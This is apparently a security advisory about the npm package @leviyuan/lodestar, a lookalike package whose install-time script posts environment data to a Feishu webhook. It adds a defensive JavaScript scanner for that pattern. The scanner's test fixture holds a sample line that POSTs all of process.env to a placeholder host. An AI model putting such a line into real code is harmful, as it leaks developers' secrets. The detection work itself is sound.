
MAL-2026-4804

Malicious code in @leviyuan/lodestar (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8c295b3a16fad72f7b165d049e75feb88883dcc1b5b8d9d72b52ac7b40aa09ba)

The package ships a lifecycle-invoked script (dist/lodestar-setup.js) that performs an HTTP POST to a hardcoded https://open.feishu.cn endpoint, with process.env data referenced in the same file. dist/lodestar.js similarly contains multiple POST calls to the same Feishu infrastructure. The hardcoded third-party C2 destination (Feishu's open API, used as a webhook receiver) combined with environment-variable access is the canonical exfiltration shape: any developer or build system that installs this package will leak environment contents to the publisher's webhook. The package name (@leviyuan/lodestar) is also a scoped lookalike of the well-known Ethereum consensus client 'lodestar' from ChainSafe, which compounds the supply-chain risk by inviting confused installs.
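The three indicators named above (a lifecycle hook that runs a packaged script, `process.env` access in that script, and an HTTP POST to a hardcoded host) can be checked mechanically before a package is allowed into a build. The following is an added defensive example, not code from the advisory, from Amazon Inspector or from the package itself; the package.json and script sources it inspects are constructed inline, and the webhook host `webhook.example.invalid` is a placeholder standing in for the real destination.

```javascript
// Added example: heuristic triage of npm lifecycle scripts for the exfiltration
// shape described in the advisory. Inputs are constructed; nothing is fetched.

const LIFECYCLE_HOOKS = [
  "preinstall", "install", "postinstall",
  "prepare", "prepublish", "preuninstall", "postuninstall",
];

// Map each lifecycle hook declared in package.json to the command it runs.
function findLifecycleScripts(pkg) {
  const scripts = pkg.scripts || {};
  const hooks = {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] === "string") hooks[hook] = scripts[hook];
  }
  return hooks;
}

// Collect distinct hostnames from hardcoded http(s):// literals in a source file.
function hardcodedHosts(src) {
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  const hosts = new Set();
  let m;
  while ((m = re.exec(src)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Indicators for one script: env access, an outbound POST, and its hardcoded hosts.
function scanScriptSource(src) {
  return {
    readsEnv: /\bprocess\.env\b/.test(src),
    posts: /\bmethod\s*:\s*["']POST["']|\.post\s*\(/i.test(src),
    hosts: hardcodedHosts(src),
  };
}

// Assess a package: for every lifecycle hook, look at the files its command
// references and report hosts not on the allow list. All three indicators
// together are rated high; a hardcoded unknown host alone is rated low.
function assessPackage(pkg, files, allowedHosts = []) {
  const findings = [];
  for (const [hook, cmd] of Object.entries(findLifecycleScripts(pkg))) {
    for (const [path, src] of Object.entries(files)) {
      if (!cmd.includes(path)) continue; // e.g. "node dist/setup.js" references dist/setup.js
      const r = scanScriptSource(src);
      const unknownHosts = r.hosts.filter((h) => !allowedHosts.includes(h));
      if (unknownHosts.length === 0) continue;
      findings.push({
        hook,
        file: path,
        hosts: unknownHosts,
        severity: r.readsEnv && r.posts ? "high" : "low",
      });
    }
  }
  return findings;
}

// Constructed sample resembling the advisory's shape (placeholder host, not the real one).
const SUSPICIOUS_PKG = {
  name: "@example/lookalike",
  version: "1.0.0",
  scripts: { postinstall: "node dist/setup.js" },
};
const SUSPICIOUS_FILES = {
  "dist/setup.js": [
    'const payload = JSON.stringify({ env: process.env });',
    'fetch("https://webhook.example.invalid/hook", { method: "POST", body: payload });',
  ].join("\n"),
};

// Constructed benign sample: a postinstall hook that only prints a message.
const BENIGN_PKG = {
  name: "@example/benign",
  version: "1.0.0",
  scripts: { postinstall: "node scripts/notice.js" },
};
const BENIGN_FILES = { "scripts/notice.js": 'console.log("thanks for installing");' };

function demo() {
  return {
    suspicious: assessPackage(SUSPICIOUS_PKG, SUSPICIOUS_FILES),
    benign: assessPackage(BENIGN_PKG, BENIGN_FILES),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The check is deliberately coarse: it is a triage signal for a pre-install gate or a registry mirror, not a verdict. Hosts a team legitimately uses (a telemetry endpoint, a corporate proxy) go on the allow list so that only unexpected destinations surface, and anything rated high should be held for manual review rather than installed.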


Affected packages

npm / @leviyuan/lodestar

No fixed version published yet for @leviyuan/lodestar (npm). Pin to a known-safe version or switch to an alternative.

References